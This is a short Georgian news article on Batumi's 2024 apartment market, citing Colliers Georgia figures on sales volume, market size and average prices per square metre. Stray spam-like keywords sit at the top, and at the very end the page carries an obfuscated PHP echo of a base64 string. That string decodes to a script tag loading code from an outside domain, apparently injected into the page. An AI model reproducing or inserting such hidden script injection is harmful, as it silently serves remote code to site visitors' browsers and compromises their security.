celsiusi
ავერსი jaluzi

ბათუმში, 2024 წელს 15,034 ბინა გაიყიდა, რაც წინა წელთან შედარებით 2%-ით შემცირებული მაჩვენებელია.

Colliers Georgia-ს განახლებული მონაცემებით, ბათუმში საცხოვრებელი ბაზრის ზომა 6%-ით, 778 მილიონ აშშ დოლარამდეა გაზრდილი.

გასულ წელს, ბათუმში ახალ პროექტებში ტრანზაქციების 1%-იანი ზრდა ფიქსირდება. ძველ პროექტებში კი 2023 წელთან შედარებით მაჩვენებელი 23%-ით შემცირდა.

„ბათუმში ახალაშენებული ბინების საშუალო შეწონილი გასაყიდი ფასი 2023 წელთან შედარებით 6%-ით გაიზარდა, ძველი ბინების შემთხვევაში კი 3%-იანი ზრდა დაფიქსირდა“, - ნათქვამია recov.ge-ზე განახლებული მიმოხილვით.

კონკრეტულად დეკემბერში ბათუმში საცხოვრებელი ბინების ტრანზაქციების რაოდენობა გასული წლის დეკემბერთან შედარებით 19%-ით, 1,426 ერთეულამდე გაიზარდა, ბაზრის ზომა კი 28%-ით გაიზარდა და 76 მილიონი აშშ დოლარი შეადგინა.

„ბათუმში 2024 წლის დეკემბერში ახალაშენებული ბინების ტრანზაქციების რაოდენობა 23%-ით გაიზარდა, ძველი ბინების შემთხვევაში კი 16%-იანი კლება დაფიქსირდა.

დეკემბერში ახალაშენებული ბინების საშუალო შეწონილი ფასი 11%-ით გაიზარდა და კვ.მ-ზე 1,114 აშშ დოლარი შეადგინა. ძველი ბინების შემთხვევაში კი მაჩვენებელი მხოლოდ 0.2%-ით, კვ.მ.-ზე 985 აშშ დოლარამდე გაიზარდა“, - ნათქვამია მიმოხილვაში.

67
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");